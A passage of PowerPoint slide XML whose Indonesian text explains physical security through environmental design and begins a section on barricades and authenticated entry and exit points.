              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>binaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendesain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanskap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempromosikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perumahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komersial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekolah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip-prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rasa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>struktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Barikade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Masuk/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keluar</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Barikade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>barikade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar-benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipanjat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gembok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicongkel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tujuan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>barikade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
